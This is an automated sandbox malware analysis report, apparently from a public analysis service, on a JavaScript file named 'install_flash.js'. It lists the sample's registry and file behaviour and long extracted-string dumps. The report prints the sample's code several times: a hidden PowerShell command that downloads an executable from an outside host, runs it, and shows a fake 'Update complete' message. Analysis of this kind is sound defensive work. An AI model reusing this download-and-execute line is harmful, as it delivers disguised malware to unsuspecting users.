Attention: please enable javascript in order to properly view and use this malware analysis service.

Incident Response

Risk Assessment

Fingerprint
Reads the active computer name
Reads the cryptographic machine GUID

Indicators

Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.

  • Suspicious Indicators 11

  • Anti-Detection/Stealthyness
  • Environment Awareness
    • Reads the active computer name
      details
      "wscript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
      source
      Registry Access
      relevance
      5/10
    • Reads the cryptographic machine GUID
      details
      "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
      source
      Registry Access
      relevance
      10/10
  • General
  • Installation/Persistance
    • Touches files in the Windows directory
      details
      "wscript.exe" touched file "%WINDIR%\System32\en-US\WScript.exe.mui"
      "wscript.exe" touched file "C:\Windows\System32\WScript.exe"
      "wscript.exe" touched file "C:\Windows\Globalization\Sorting\sortdefault.nls"
      "wscript.exe" touched file "C:\Windows\system32\rsaenh.dll"
      "wscript.exe" touched file "C:\Windows\system32\wshom.ocx"
      "wscript.exe" touched file "C:\Windows\System32\OLEACCRC.DLL"
      "wscript.exe" touched file "C:\Windows\System32"
      "wscript.exe" touched file "C:\Windows\System32\WindowsPowerShell"
      "wscript.exe" touched file "C:\Windows\System32\WindowsPowerShell\v1.0"
      "wscript.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
      "wscript.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
      "wscript.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db"
      "wscript.exe" touched file "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      source
      API Call
      relevance
      7/10
  • System Security
    • Modifies proxy settings
      details
      "wscript.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
      "wscript.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
      source
      Registry Access
      relevance
      10/10
    • Queries sensitive IE security settings
      details
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
      source
      Registry Access
      relevance
      8/10
    • Queries the display settings of system associated file extensions
      details
      "wscript.exe" (Access type: "QUERYVAL"; Path: "HKCR\SOFTWARE\CLASSES\SYSTEMFILEASSOCIATIONS\.EXE"; Key: "ALWAYSSHOWEXT")
      "wscript.exe" (Access type: "QUERYVAL"; Path: "HKCR\SOFTWARE\CLASSES\SYSTEMFILEASSOCIATIONS\.EXE"; Key: "NEVERSHOWEXT")
      source
      Registry Access
      relevance
      7/10
  • Unusual Characteristics
    • Reads information about supported languages
      details
      "wscript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\CUSTOMLOCALE"; Key: "EN-US")
      "wscript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\EXTENDEDLOCALE"; Key: "EN-US")
      "wscript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
      source
      Registry Access
      relevance
      3/10
  • Hiding 1 Suspicious Indicators
    • All indicators are available only in the private webservice or standalone version
  • Informative 9

  • General
    • Creates mutants
      details
      "\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
      "\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
      "\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
      "\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
      source
      Created Mutant
      relevance
      3/10
    • Extracted beautified Javascript
      details
      Beautified JS: "a = new ActiveXObject('Wscript.Shell');
      a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\1bfa2cdda4c080ad394407b7cd318b1c.exe';(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)", 0, false);"
      source
      Static Parser
      relevance
      5/10
    • Loads the .NET runtime environment
      details
      "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll" at 6AAA0000
      source
      Loaded Module
    • Reads Windows Trust Settings
      details
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINTRUST\TRUST PROVIDERS\SOFTWARE PUBLISHING"; Key: "STATE")
      source
      Registry Access
      relevance
      5/10
    • Spawns new processes
      details
      Spawned process "powershell.exe" with commandline "-WindowStyle Hidden $d=$env:temp+'\1bfa2cdda4c080ad394407b7cd318b1c.exe';(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)" (Show Process)
      source
      Monitored Target
      relevance
      3/10
  • Installation/Persistance
    • Connects to LPC ports
      details
      "wscript.exe" connecting to "\ThemeApiPort"
      source
      API Call
      relevance
      1/10
    • Dropped files
      details
      "U35A9ZJJNQNW4QIIY9TP.temp" has type "data"
      source
      Binary File
      relevance
      3/10
  • Network Related
  • System Security

File Details

All Details:

install_flash.js

Filename
install_flash.js
Size
490B (490 bytes)
Type
script javascript
Description
ASCII text, with very long lines, with CRLF line terminators
Architecture
WINDOWS
SHA256
0a85c898dc8c3a0b2ff3989295922eb91dd6707e83193168624312198208578fCopy SHA256 to clipboard
MD5
3bd92cbe8d3a95aac3774be884225a9aCopy MD5 to clipboard
SHA1
5caf6c074a48df5c2f8a49a7efd8039f42f03b21Copy SHA1 to clipboard

Resources

Icon
Sample Icon

Visualization

Input File (PortEx)
PE Visualization

Screenshots

Loading content, please wait...

Hybrid Analysis

Tip: Click an analysed process below to view more details.

Analysed 2 processes in total (System Resource Monitor).

  • wscript.exe "C:\0a85c898dc8c3a0b2ff3989295922eb91dd6707e83193168624312198208578f.js" (PID: 2812)
    • powershell.exe -WindowStyle Hidden $d=$env:temp+'\1bfa2cdda4c080ad394407b7cd318b1c.exe';(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information) (PID: 2780)

Network Analysis

DNS Requests

No relevant DNS requests were made.

Contacted Hosts

No relevant hosts were contacted.

HTTP Traffic

No relevant HTTP requests were made.

Extracted Strings

All Details:
"C:\0a85c898dc8c3a0b2ff3989295922eb91dd6707e83193168624312198208578f.js"
Ansi based on Process Commandline (wscript.exe)
$Function
Unicode based on Runtime Data (wscript.exe )
-WindowStyle Hidden $d=$env:temp+'\1bfa2cdda4c080ad394407b7cd318b1c.exe';(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)
Ansi based on Process Commandline (powershell.exe)
\Sessions\1\Windows\ApiPort
Unicode based on Runtime Data (wscript.exe )
\ThemeApiPort
Unicode based on Runtime Data (wscript.exe )
_,,,,qJ,,,
Ansi based on Image Processing (screen_0.png)
__,,q?___m,_,_,_q,_??_??_v?_,?,,
Ansi based on Image Processing (screen_0.png)
`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data (wscript.exe )
`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data (wscript.exe )
`\??\Volume{8177f4e8-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data (wscript.exe )
a = new ActiveXObject('Wscript.Shell');a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\1bfa2cdda4c080ad394407b7cd318b1c.exe';(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)", 0, false);
Ansi based on Memory/File Scan (0a85c898dc8c3a0b2ff3989295922eb91dd6707e83193168624312198208578f)
a=new ActiveXObject('Wscript.Shell');a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\1bfa2cdda4c080ad394407b7cd318b1c.exe';(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false);
Ansi based on Hybrid Analysis (0a85c898dc8c3a0b2ff3989295922eb91dd6707e83193168624312198208578f.js.bin)
AlwaysShowExt
Unicode based on Runtime Data (wscript.exe )
AppendPath
Unicode based on Runtime Data (wscript.exe )
Attributes
Unicode based on Runtime Data (wscript.exe )
AuthenticodeEnabled
Unicode based on Runtime Data (wscript.exe )
AutoCheckSelect
Unicode based on Runtime Data (wscript.exe )
AutoDetect
Unicode based on Runtime Data (wscript.exe )
BrowseInPlace
Unicode based on Runtime Data (wscript.exe )
CallForAttributes
Unicode based on Runtime Data (wscript.exe )
CEIPEnable
Unicode based on Runtime Data (wscript.exe )
Com+Enabled
Unicode based on Runtime Data (wscript.exe )
COM+Enabled
Unicode based on Runtime Data (wscript.exe )
ComputerName
Unicode based on Runtime Data (wscript.exe )
Content Type
Unicode based on Runtime Data (wscript.exe )
CreateUriCacheSize
Unicode based on Runtime Data (wscript.exe )
CWDIllegalInDLLSearch
Unicode based on Runtime Data (wscript.exe )
DebugHeapFlags
Unicode based on Runtime Data (wscript.exe )
DefaultLevel
Unicode based on Runtime Data (wscript.exe )
DelegateExecute
Unicode based on Runtime Data (wscript.exe )
Description
Unicode based on Runtime Data (wscript.exe )
DevicePath
Unicode based on Runtime Data (wscript.exe )
DiagLevel
Unicode based on Runtime Data (wscript.exe )
DiagMatchAnyMask
Unicode based on Runtime Data (wscript.exe )
DisableImprovedZoneCheck
Unicode based on Runtime Data (wscript.exe )
DisableLocalOverride
Unicode based on Runtime Data (wscript.exe )
DisableMetaFiles
Unicode based on Runtime Data (wscript.exe )
DisableSecuritySettingsCheck
Unicode based on Runtime Data (wscript.exe )
DisableUserModeCallbackFilter
Unicode based on Runtime Data (wscript.exe )
DocObject
Unicode based on Runtime Data (wscript.exe )
DontPrettyPath
Unicode based on Runtime Data (wscript.exe )
DriveMask
Unicode based on Runtime Data (wscript.exe )
EnablePunycode
Unicode based on Runtime Data (wscript.exe )
FipsAlgorithmPolicy
Unicode based on Runtime Data (wscript.exe )
FolderTypeID
Unicode based on Runtime Data (wscript.exe )
Generation
Unicode based on Runtime Data (wscript.exe )
GlobalSession
Unicode based on Runtime Data (wscript.exe )
HasNavigationEnum
Unicode based on Runtime Data (wscript.exe )
HideFileExt
Unicode based on Runtime Data (wscript.exe )
HideFolderVerbs
Unicode based on Runtime Data (wscript.exe )
HideIcons
Unicode based on Runtime Data (wscript.exe )
HideInWebView
Unicode based on Runtime Data (wscript.exe )
HideOnDesktopPerUser
Unicode based on Runtime Data (wscript.exe )
IconsOnly
Unicode based on Runtime Data (wscript.exe )
IgnoreUserSettings
Unicode based on Runtime Data (wscript.exe )
Image Path
Unicode based on Runtime Data (wscript.exe )
InitFolderHandler
Unicode based on Runtime Data (wscript.exe )
InprocServer32
Unicode based on Runtime Data (wscript.exe )
IntranetName
Unicode based on Runtime Data (wscript.exe )
IsShortcut
Unicode based on Runtime Data (wscript.exe )
LdapClientIntegrity
Unicode based on Runtime Data (wscript.exe )
LoadAppInit_DLLs
Unicode based on Runtime Data (wscript.exe )
LoadWithoutCOM
Unicode based on Runtime Data (wscript.exe )
LocalizedName
Unicode based on Runtime Data (wscript.exe )
LocalRedirectOnly
Unicode based on Runtime Data (wscript.exe )
LogFileName
Unicode based on Runtime Data (wscript.exe )
LogSecuritySuccesses
Unicode based on Runtime Data (wscript.exe )
MachineGuid
Unicode based on Runtime Data (wscript.exe )
MachinePreferredUILanguages
Unicode based on Runtime Data (wscript.exe )
MachineThrottling
Unicode based on Runtime Data (wscript.exe )
MapNetDriveVerbs
Unicode based on Runtime Data (wscript.exe )
MapNetDrvBtn
Unicode based on Runtime Data (wscript.exe )
MartaExtension
Unicode based on Runtime Data (wscript.exe )
MaximizeApps
Unicode based on Runtime Data (wscript.exe )
MaxRpcSize
Unicode based on Runtime Data (wscript.exe )
MaxSxSHashCount
Unicode based on Runtime Data (wscript.exe )
NdrOleExtDLL
Unicode based on Runtime Data (wscript.exe )
NeverShowExt
Unicode based on Runtime Data (wscript.exe )
NoFileFolderJunction
Unicode based on Runtime Data (wscript.exe )
NoNetCrawling
Unicode based on Runtime Data (wscript.exe )
NoWorkingDirectory
Unicode based on Runtime Data (wscript.exe )
OOBEInProgress
Unicode based on Runtime Data (wscript.exe )
PageAllocatorSystemHeapIsPrivate
Unicode based on Runtime Data (wscript.exe )
PageAllocatorUseSystemHeap
Unicode based on Runtime Data (wscript.exe )
ParentFolder
Unicode based on Runtime Data (wscript.exe )
ParsingName
Unicode based on Runtime Data (wscript.exe )
PinToNameSpaceTree
Unicode based on Runtime Data (wscript.exe )
PolicyScope
Unicode based on Runtime Data (wscript.exe )
PowerShell"*
Unicode based on Runtime Data (wscript.exe )
PowerShell.exe
Unicode based on Runtime Data (wscript.exe )
PreCreate
Unicode based on Runtime Data (wscript.exe )
PreferExternalManifest
Unicode based on Runtime Data (wscript.exe )
PreferredUILanguages
Unicode based on Runtime Data (wscript.exe )
PrivateKeyLifetimeSeconds
Unicode based on Runtime Data (wscript.exe )
PrivKeyCacheMaxItems
Unicode based on Runtime Data (wscript.exe )
PrivKeyCachePurgeIntervalSeconds
Unicode based on Runtime Data (wscript.exe )
ProfileImagePath
Unicode based on Runtime Data (wscript.exe )
ProxyBypass
Unicode based on Runtime Data (wscript.exe )
PublishExpandedPath
Unicode based on Runtime Data (wscript.exe )
QueryForInfoTip
Unicode based on Runtime Data (wscript.exe )
QueryForOverlay
Unicode based on Runtime Data (wscript.exe )
RelativePath
Unicode based on Runtime Data (wscript.exe )
RemoteRpcDll
Unicode based on Runtime Data (wscript.exe )
RestrictedAttributes
Unicode based on Runtime Data (wscript.exe )
RuleCount
Unicode based on Runtime Data (wscript.exe )
SafeDllSearchMode
Unicode based on Runtime Data (wscript.exe )
SafeProcessSearchMode
Unicode based on Runtime Data (wscript.exe )
SaferFlags
Unicode based on Runtime Data (wscript.exe )
Safety Warning Level
Unicode based on Runtime Data (wscript.exe )
Security_HKLM_only
Unicode based on Runtime Data (wscript.exe )
SeparateProcess
Unicode based on Runtime Data (wscript.exe )
SetWorkingDirectoryFromTarget
Unicode based on Runtime Data (wscript.exe )
ShellState
Unicode based on Runtime Data (wscript.exe )
ShowCompColor
Unicode based on Runtime Data (wscript.exe )
ShowInfoTip
Unicode based on Runtime Data (wscript.exe )
ShowSuperHidden
Unicode based on Runtime Data (wscript.exe )
ShowTypeOverlay
Unicode based on Runtime Data (wscript.exe )
SourcePath
Unicode based on Runtime Data (wscript.exe )
SpecialFoldersCacheSize
Unicode based on Runtime Data (wscript.exe )
StreamResource
Unicode based on Runtime Data (wscript.exe )
StreamResourceType
Unicode based on Runtime Data (wscript.exe )
SuppressionPolicy
Unicode based on Runtime Data (wscript.exe )
SystemSetupInProgress
Unicode based on Runtime Data (wscript.exe )
ThemeApiConnectionRequest
Unicode based on Runtime Data (wscript.exe )
ThreadingModel
Unicode based on Runtime Data (wscript.exe )
TransparentEnabled
Unicode based on Runtime Data (wscript.exe )
TrustPolicy
Unicode based on Runtime Data (wscript.exe )
UNCAsIntranet
Unicode based on Runtime Data (wscript.exe )
UseDropHandler
Unicode based on Runtime Data (wscript.exe )
UseHostnameAsAlias
Unicode based on Runtime Data (wscript.exe )
UseOldHostResolutionOrder
Unicode based on Runtime Data (wscript.exe )
UseWINSAFER
Unicode based on Runtime Data (wscript.exe )
WantsAliasedNotifications
Unicode based on Runtime Data (wscript.exe )
WantsFORDISPLAY
Unicode based on Runtime Data (wscript.exe )
WantsFORPARSING
Unicode based on Runtime Data (wscript.exe )
WantsParseDisplayName
Unicode based on Runtime Data (wscript.exe )
WantsUniversalDelegate
Unicode based on Runtime Data (wscript.exe )
WindowsPowerShell
Unicode based on Runtime Data (wscript.exe )
WScript.exe
Unicode based on Runtime Data (wscript.exe )
{031E4825-7B94-4DC3-B131-E946B44C8DD5}
Unicode based on Runtime Data (wscript.exe )
{04731B67-D933-450A-90E6-4ACD2E9408FE}
Unicode based on Runtime Data (wscript.exe )
{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}
Unicode based on Runtime Data (wscript.exe )
{11016101-E366-4D22-BC06-4ADA335C892B}
Unicode based on Runtime Data (wscript.exe )
{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}
Unicode based on Runtime Data (wscript.exe )
{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
Unicode based on Runtime Data (wscript.exe )
{208D2C60-3AEA-1069-A2D7-08002B30309D}
Unicode based on Runtime Data (wscript.exe )
{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Unicode based on Runtime Data (wscript.exe )
{26EE0668-A00A-44D7-9371-BEB064C98683}
Unicode based on Runtime Data (wscript.exe )
{4336A54D-038B-4685-AB02-99BB52D3FB8B}
Unicode based on Runtime Data (wscript.exe )
{450D8FBA-AD25-11D0-98A8-0800361B1103}
Unicode based on Runtime Data (wscript.exe )
{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}
Unicode based on Runtime Data (wscript.exe )
{59031A47-3F72-44A7-89C5-5595FE6B30EE}
Unicode based on Runtime Data (wscript.exe )
{645FF040-5081-101B-9F08-00AA002F954E}
Unicode based on Runtime Data (wscript.exe )
{871C5380-42A0-1069-A2EA-08002B30309D}
Unicode based on Runtime Data (wscript.exe )
{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-000000000046} 0xFFFF
Unicode based on Runtime Data (wscript.exe )
{89D83576-6BD1-4C86-9454-BEB04E94C819}
Unicode based on Runtime Data (wscript.exe )
{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}
Unicode based on Runtime Data (wscript.exe )
{9343812E-1C37-4A49-A12E-4B2D810D956B}
Unicode based on Runtime Data (wscript.exe )
{98D99750-0B8A-4C59-9151-589053683D73}
Unicode based on Runtime Data (wscript.exe )
{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}
Unicode based on Runtime Data (wscript.exe )
{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}
Unicode based on Runtime Data (wscript.exe )
{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}
Unicode based on Runtime Data (wscript.exe )
{E345F35F-9397-435C-8F95-4E922C26259E}
Unicode based on Runtime Data (wscript.exe )
{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
Unicode based on Runtime Data (wscript.exe )
{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}
Unicode based on Runtime Data (wscript.exe )
{F3F5824C-AD58-4728-AF59-A1EBE3392799}
Unicode based on Runtime Data (wscript.exe )
"C:\0a85c898dc8c3a0b2ff3989295922eb91dd6707e83193168624312198208578f.js"
Ansi based on Process Commandline (wscript.exe)
-WindowStyle Hidden $d=$env:temp+'\1bfa2cdda4c080ad394407b7cd318b1c.exe';(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)
Ansi based on Process Commandline (powershell.exe)
\Sessions\1\Windows\ApiPort
Unicode based on Runtime Data (wscript.exe )
\ThemeApiPort
Unicode based on Runtime Data (wscript.exe )
`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data (wscript.exe )
`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data (wscript.exe )
`\??\Volume{8177f4e8-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data (wscript.exe )
a = new ActiveXObject('Wscript.Shell');a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\1bfa2cdda4c080ad394407b7cd318b1c.exe';(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)", 0, false);
Ansi based on Memory/File Scan (0a85c898dc8c3a0b2ff3989295922eb91dd6707e83193168624312198208578f)
a=new ActiveXObject('Wscript.Shell');a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\1bfa2cdda4c080ad394407b7cd318b1c.exe';(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false);
Ansi based on Hybrid Analysis (0a85c898dc8c3a0b2ff3989295922eb91dd6707e83193168624312198208578f.js.bin)
Com+Enabled
Unicode based on Runtime Data (wscript.exe )
COM+Enabled
Unicode based on Runtime Data (wscript.exe )
ComputerName
Unicode based on Runtime Data (wscript.exe )
DelegateExecute
Unicode based on Runtime Data (wscript.exe )
Description
Unicode based on Runtime Data (wscript.exe )
DisableLocalOverride
Unicode based on Runtime Data (wscript.exe )
LoadWithoutCOM
Unicode based on Runtime Data (wscript.exe )
LocalizedName
Unicode based on Runtime Data (wscript.exe )
LocalRedirectOnly
Unicode based on Runtime Data (wscript.exe )
PowerShell.exe
Unicode based on Runtime Data (wscript.exe )
PrivateKeyLifetimeSeconds
Unicode based on Runtime Data (wscript.exe )
PrivKeyCacheMaxItems
Unicode based on Runtime Data (wscript.exe )
PrivKeyCachePurgeIntervalSeconds
Unicode based on Runtime Data (wscript.exe )
QueryForInfoTip
Unicode based on Runtime Data (wscript.exe )
RemoteRpcDll
Unicode based on Runtime Data (wscript.exe )
SafeProcessSearchMode
Unicode based on Runtime Data (wscript.exe )
SeparateProcess
Unicode based on Runtime Data (wscript.exe )
SetWorkingDirectoryFromTarget
Unicode based on Runtime Data (wscript.exe )
ShowCompColor
Unicode based on Runtime Data (wscript.exe )
ShowInfoTip
Unicode based on Runtime Data (wscript.exe )
ThemeApiConnectionRequest
Unicode based on Runtime Data (wscript.exe )
UseWINSAFER
Unicode based on Runtime Data (wscript.exe )
WScript.exe
Unicode based on Runtime Data (wscript.exe )
{031E4825-7B94-4DC3-B131-E946B44C8DD5}
Unicode based on Runtime Data (wscript.exe )
{04731B67-D933-450A-90E6-4ACD2E9408FE}
Unicode based on Runtime Data (wscript.exe )
{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}
Unicode based on Runtime Data (wscript.exe )
{11016101-E366-4D22-BC06-4ADA335C892B}
Unicode based on Runtime Data (wscript.exe )
{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}
Unicode based on Runtime Data (wscript.exe )
{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
Unicode based on Runtime Data (wscript.exe )
{208D2C60-3AEA-1069-A2D7-08002B30309D}
Unicode based on Runtime Data (wscript.exe )
{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Unicode based on Runtime Data (wscript.exe )
{26EE0668-A00A-44D7-9371-BEB064C98683}
Unicode based on Runtime Data (wscript.exe )
{4336A54D-038B-4685-AB02-99BB52D3FB8B}
Unicode based on Runtime Data (wscript.exe )
{450D8FBA-AD25-11D0-98A8-0800361B1103}
Unicode based on Runtime Data (wscript.exe )
{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}
Unicode based on Runtime Data (wscript.exe )
{59031A47-3F72-44A7-89C5-5595FE6B30EE}
Unicode based on Runtime Data (wscript.exe )
{645FF040-5081-101B-9F08-00AA002F954E}
Unicode based on Runtime Data (wscript.exe )
{871C5380-42A0-1069-A2EA-08002B30309D}
Unicode based on Runtime Data (wscript.exe )
{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-000000000046} 0xFFFF
Unicode based on Runtime Data (wscript.exe )
{89D83576-6BD1-4C86-9454-BEB04E94C819}
Unicode based on Runtime Data (wscript.exe )
{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}
Unicode based on Runtime Data (wscript.exe )
{9343812E-1C37-4A49-A12E-4B2D810D956B}
Unicode based on Runtime Data (wscript.exe )
{98D99750-0B8A-4C59-9151-589053683D73}
Unicode based on Runtime Data (wscript.exe )
{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}
Unicode based on Runtime Data (wscript.exe )
{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}
Unicode based on Runtime Data (wscript.exe )
{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}
Unicode based on Runtime Data (wscript.exe )
{E345F35F-9397-435C-8F95-4E922C26259E}
Unicode based on Runtime Data (wscript.exe )
{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
Unicode based on Runtime Data (wscript.exe )
{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}
Unicode based on Runtime Data (wscript.exe )
{F3F5824C-AD58-4728-AF59-A1EBE3392799}
Unicode based on Runtime Data (wscript.exe )
"C:\0a85c898dc8c3a0b2ff3989295922eb91dd6707e83193168624312198208578f.js"
Ansi based on Process Commandline (wscript.exe)
$Function
Unicode based on Runtime Data (wscript.exe )
\Sessions\1\Windows\ApiPort
Unicode based on Runtime Data (wscript.exe )
\ThemeApiPort
Unicode based on Runtime Data (wscript.exe )
`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data (wscript.exe )
`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data (wscript.exe )
`\??\Volume{8177f4e8-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data (wscript.exe )
AlwaysShowExt
Unicode based on Runtime Data (wscript.exe )
AppendPath
Unicode based on Runtime Data (wscript.exe )
Attributes
Unicode based on Runtime Data (wscript.exe )
AuthenticodeEnabled
Unicode based on Runtime Data (wscript.exe )
AutoCheckSelect
Unicode based on Runtime Data (wscript.exe )
AutoDetect
Unicode based on Runtime Data (wscript.exe )
BrowseInPlace
Unicode based on Runtime Data (wscript.exe )
CallForAttributes
Unicode based on Runtime Data (wscript.exe )
CEIPEnable
Unicode based on Runtime Data (wscript.exe )
Com+Enabled
Unicode based on Runtime Data (wscript.exe )
COM+Enabled
Unicode based on Runtime Data (wscript.exe )
ComputerName
Unicode based on Runtime Data (wscript.exe )
Content Type
Unicode based on Runtime Data (wscript.exe )
CreateUriCacheSize
Unicode based on Runtime Data (wscript.exe )
CWDIllegalInDLLSearch
Unicode based on Runtime Data (wscript.exe )
DebugHeapFlags
Unicode based on Runtime Data (wscript.exe )
DefaultLevel
Unicode based on Runtime Data (wscript.exe )
DelegateExecute
Unicode based on Runtime Data (wscript.exe )
Description
Unicode based on Runtime Data (wscript.exe )
DevicePath
Unicode based on Runtime Data (wscript.exe )
DiagLevel
Unicode based on Runtime Data (wscript.exe )
DiagMatchAnyMask
Unicode based on Runtime Data (wscript.exe )
DisableImprovedZoneCheck
Unicode based on Runtime Data (wscript.exe )
DisableLocalOverride
Unicode based on Runtime Data (wscript.exe )
DisableMetaFiles
Unicode based on Runtime Data (wscript.exe )
DisableSecuritySettingsCheck
Unicode based on Runtime Data (wscript.exe )
DisableUserModeCallbackFilter
Unicode based on Runtime Data (wscript.exe )
DocObject
Unicode based on Runtime Data (wscript.exe )
DontPrettyPath
Unicode based on Runtime Data (wscript.exe )
DriveMask
Unicode based on Runtime Data (wscript.exe )
EnablePunycode
Unicode based on Runtime Data (wscript.exe )
FipsAlgorithmPolicy
Unicode based on Runtime Data (wscript.exe )
FolderTypeID
Unicode based on Runtime Data (wscript.exe )
Generation
Unicode based on Runtime Data (wscript.exe )
GlobalSession
Unicode based on Runtime Data (wscript.exe )
HasNavigationEnum
Unicode based on Runtime Data (wscript.exe )
HideFileExt
Unicode based on Runtime Data (wscript.exe )
HideFolderVerbs
Unicode based on Runtime Data (wscript.exe )
HideIcons
Unicode based on Runtime Data (wscript.exe )
HideInWebView
